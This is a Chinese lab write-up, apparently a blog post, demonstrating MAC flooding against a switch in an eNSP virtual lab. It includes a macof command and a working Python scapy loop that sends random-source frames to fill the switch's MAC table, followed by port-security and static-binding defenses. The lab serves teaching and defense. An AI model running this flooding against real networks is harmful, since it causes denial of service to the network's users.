目录
前言
实验之前我们首先要知道数据链路层的协议,电脑通过交换机的mac地址表进行寻址通信,但是mac地址表有限
使用macof进行mac泛洪
准备工具:虚拟机kali:192.168.18.131/24
虚拟机windows ensp
打开ensp配置拓扑图
cloud的配置如下,因为是虚拟机,所有自己选用nat网段
连接后配置pc的ip,配成和cloud一个网段的
现在ping测试,结果成功
kal点击命令
sudo macof -d 192.168.18.199
现在已经ping失败了,不通了
查看交换机mac地址表,已经爆满
kali停止攻击后等待两分钟再查看,又可以ping通了
大概五分钟后,mac地址表恢复正常
实验结束
使用python的scapy模块进行攻击
python代码如下,循环可以自己修改
from scapy.all import Ether, sendp, RandMAC
# 创建一个以太网帧,源MAC地址是随机生成的
#packet = Ether(src=RandMAC(), dst="ff:ff:ff:ff:ff:ff") / "MAC Flooding Test"
for _ in range(100000):
packet = Ether(src=RandMAC(), dst="ff:ff:ff:ff:ff:ff") / "MAC Flooding Test"
sendp(packet)
运行效果如图
运行之后是一样的结果
实验结束
加固方法
在cloud端口开启端口安全
还可以使用静态mac地址绑定。
更多方法得自己去了解了。
标签:ensp,python,虚拟机,地址,mac,ff,泛洪 From: https://blog.csdn.net/2303_76902210/article/details/141962518